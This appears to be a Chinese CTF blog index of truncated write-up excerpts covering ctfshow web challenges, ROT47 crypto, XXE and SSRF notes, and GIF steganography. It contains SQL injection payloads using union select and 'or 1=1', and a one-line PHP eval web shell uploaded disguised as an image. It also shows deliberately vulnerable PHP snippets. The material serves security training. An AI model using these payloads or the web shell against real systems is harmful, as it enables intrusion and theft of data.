web–signin查看源代码看到有个js文件在源代码最下面找个被注释的内容 1//# sourceMappingURL=index-33309f51.js.map 进入/assets/index-33309f51.js.map下载了一个文件，用记事本打开ctrl+f查找关键词，0xgame找到flagflag 10xGame{c788fa80-2184-429f-b

CLassical Crypto – ezrot得到一个密文 1>@64E7LC@Ecf0:D0;FDE020D:>!=60=6EE6C0DF3DE:EFE:@?04:!96C0tsAJdEA6d;F}%0N 经过查询得知使用的是ROT5/13/18/47加密，使用ROT47方法解密即可得到flagflag 1moectf{rot47

XXE漏洞介绍XXE漏洞详解 web3731234567891011121314error_reporting(0);libxml_disable_entity_loader(false);$xmlfile = file_get_contents('php://input');if(isset($xmlfile)){ $dom = new DOMDocument

知识点：SSRF攻击点 123456789<?php$url=$_POST['url'];$ch=curl_init($url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$result=curl_exec($ch);curl_close($ch);?&g

web171常规sql注入payload: 123456-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+-1' union select 1,2,group_concat(column_name) from

web89123456789101112include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){

金三胖下载给的zip文件，是个gif动图使用stegsolve打开 File Format: 文件格式，这个主要是查看图片的具体信息，类似与winhex的用法 Data Extract: 数据抽取，图片中隐藏数据的抽取 Frame Browser: 逐帧浏览，主要是对GIF之类的动图进行分解，动图变成一张张图片，便于查看 Image Combiner: 拼图，图片拼接 用Frame b

web254123456789101112131415161718192021222324252627282930313233343536373839404142error_reporting(0);highlight_file(__FILE__);include('flag.php');class ctfShowUser{ public $username=&

web151首先创建一个记事本,内容为<?php eval($_POST['a']);?>然后修改文件后缀为png，因为题目要求上传一个图片文件，上传时使用burpsuite进行抓包，在burpsuit上修改将后缀名改为php文件上传成功后，会给你你刚才上传的路径在url中输入以进入路径，然后复制网址使用中国蚁剑进入文件查询获取flag web152同上，一模一样 we

web1ctrl+u查看源代码即可找到base64编码形式的flag web2输入万能钥匙使用burp suite抓包在burp suite里右键选择send to repeater使用联合查询来查询回显位置 11' or 1=1 union select 1,2,3# 接着就是爆库 11' or 1=1 union select 1,database(),3# 爆表 11&#